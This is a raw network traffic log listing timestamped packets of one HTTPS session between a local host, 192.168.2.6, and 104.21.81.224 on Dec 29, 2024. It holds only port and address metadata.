Dec 29, 2024 16:07:27.744162083 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:27.744446039 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:27.792084932 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:27.792115927 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:27.792222977 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:27.792232037 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:27.792279959 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:27.911870003 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:27.911902905 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:27.911956072 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:27.911968946 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:27.912014008 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:27.917036057 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:27.917057037 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:27.917095900 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:27.917103052 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:27.917144060 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:27.917165041 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:27.922993898 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:27.923018932 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:27.923067093 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:27.923074007 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:27.923105001 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:27.923121929 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:27.928740025 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:27.928761005 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:27.928807020 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:27.928813934 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:27.928845882 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:27.928868055 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:27.934616089 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:27.934643984 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:27.934678078 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:27.934689045 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:27.934716940 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:27.934745073 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:27.939930916 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:27.939951897 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:27.940012932 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:27.940022945 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:27.940063000 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:27.945873022 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:27.945894957 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:27.945941925 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:27.945949078 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:27.945987940 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:27.946008921 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:27.993690014 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:27.993716002 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:27.993793964 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:27.993803978 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:27.993901014 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:28.113311052 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:28.113337040 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:28.113476992 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:28.113488913 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:28.113528967 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:28.118541956 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:28.118563890 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:28.118611097 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:28.118618011 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:28.118640900 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:28.118655920 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:28.124509096 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:28.124540091 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:28.124576092 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:28.124582052 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:28.124603033 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:28.124623060 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:28.130079031 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:28.130100012 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:28.130145073 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:28.130152941 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:28.130163908 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:28.130187035 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:28.135915995 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:28.135936975 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:28.135989904 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:28.135998011 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:28.136037111 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:28.141122103 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:28.141141891 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:28.141197920 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:28.141206026 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:28.141243935 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:28.147104979 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:28.147125959 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:28.147186041 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:28.147193909 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:28.147236109 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:28.195166111 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:28.195194006 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:28.195244074 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:28.195252895 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:28.195290089 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:28.195303917 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:28.315696001 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:28.315769911 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:28.315880060 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:28.315900087 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:28.315939903 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:28.315962076 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:28.320400953 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:28.320427895 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:28.320538998 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:28.320547104 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:28.320590973 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:28.326185942 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:28.326203108 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:28.326277018 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:28.326282978 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:28.327191114 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:28.332144976 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:28.332165003 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:28.332232952 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:28.332241058 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:28.332287073 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:28.338244915 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:28.338262081 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:28.338329077 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:28.338335991 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:28.338372946 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:28.344187021 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:28.344204903 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:28.344278097 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:28.344285011 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:28.344326019 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:28.350110054 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:28.350126982 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:28.350212097 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:28.350219011 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:28.350258112 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:28.396439075 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:28.396462917 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:28.396606922 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:28.396622896 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:28.396667957 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:28.516560078 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:28.516583920 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:28.517225981 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:28.517236948 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:28.517291069 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:28.521697044 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:28.521713972 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:28.521795034 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:28.521800995 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:28.521852970 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:28.527525902 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:28.527543068 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:28.527621031 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:28.527626038 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:28.527667046 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:28.533193111 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:28.533209085 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:28.533271074 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:28.533277988 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:28.533313990 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:28.539078951 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:28.539105892 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:28.539149046 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:28.539155006 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:28.539181948 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:28.539190054 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:28.545006037 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:28.545022964 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:28.545094967 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:28.545099974 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:28.545140982 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:28.550144911 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:28.550159931 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:28.550241947 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:28.550246954 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:28.550287962 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:28.597661972 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:28.597687960 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:28.597780943 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:28.597790956 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:28.597836018 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:28.717832088 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:28.717855930 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:28.717993021 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:28.718005896 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:28.718051910 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:28.723047972 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:28.723064899 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:28.723140001 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:28.723145962 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:28.723186016 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:28.728995085 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:28.729017019 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:28.729080915 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:28.729087114 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:28.729132891 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:28.734431028 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:28.734447956 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:28.734518051 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:28.734524012 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:28.734563112 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:28.740278959 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:28.740295887 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:28.740358114 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:28.740361929 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:28.740400076 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:28.746228933 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:28.746248007 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:28.746323109 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:28.746328115 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:28.746361017 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:28.751451015 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:28.751466990 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:28.751538992 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:28.751544952 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:28.751591921 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:28.799005985 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:28.799024105 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:28.799079895 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:28.799094915 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:28.799153090 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:28.918833017 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:28.918855906 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:28.918956041 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:28.918970108 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:28.919034004 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:28.925666094 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:28.925682068 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:28.925755978 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:28.925765038 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:28.925811052 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:28.930600882 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:28.930617094 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:28.930686951 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:28.930695057 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:28.930732012 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:28.935812950 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:28.935830116 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:28.935900927 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:28.935908079 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:28.935945988 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:28.944298983 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:28.944315910 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:28.944403887 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:28.944408894 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:28.944446087 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:28.948216915 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:28.948232889 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:28.948282957 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:28.948288918 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:28.948312998 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:28.948328018 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:28.953711033 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:28.953727007 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:28.953813076 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:28.953819990 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:28.953860044 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:29.001446009 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:29.001476049 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:29.001607895 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:29.001616001 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:29.001667976 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:29.121670008 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:29.121695042 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:29.121849060 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:29.121871948 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:29.121922016 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:29.126969099 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:29.126986980 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:29.127063990 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:29.127084017 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:29.127135038 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:29.132282019 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:29.132297039 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:29.132359028 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:29.132365942 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:29.132406950 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:29.137717962 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:29.137734890 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:29.137815952 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:29.137823105 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:29.137861967 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:29.142944098 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:29.142960072 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:29.143044949 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:29.143059969 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:29.143126011 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:29.149473906 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:29.149491072 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:29.149561882 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:29.149576902 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:29.149643898 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:29.155658960 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:29.155674934 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:29.155746937 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:29.155760050 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:29.155806065 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:29.202896118 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:29.202917099 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:29.203067064 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:29.203075886 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:29.203119993 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:29.322042942 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:29.322061062 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:29.322159052 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:29.322166920 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:29.322215080 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:29.327984095 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:29.328001022 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:29.328063965 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:29.328071117 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:29.328108072 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:29.333195925 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:29.333211899 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:29.333285093 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:29.333291054 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:29.333328962 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:29.339376926 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:29.339392900 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:29.339472055 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:29.339477062 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:29.339515924 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:29.344630957 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:29.344650030 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:29.344712019 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:29.344717979 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:29.344752073 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:29.350430012 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:29.350445986 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:29.350506067 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:29.350512028 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:29.350549936 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:29.356395006 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:29.356410027 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:29.356539965 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:29.356545925 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:29.356586933 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:29.403913021 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:29.403944016 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:29.403987885 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:29.403995037 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:29.404026031 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:29.404047012 CET	49750	443	192.168.2.6	104.21.81.224
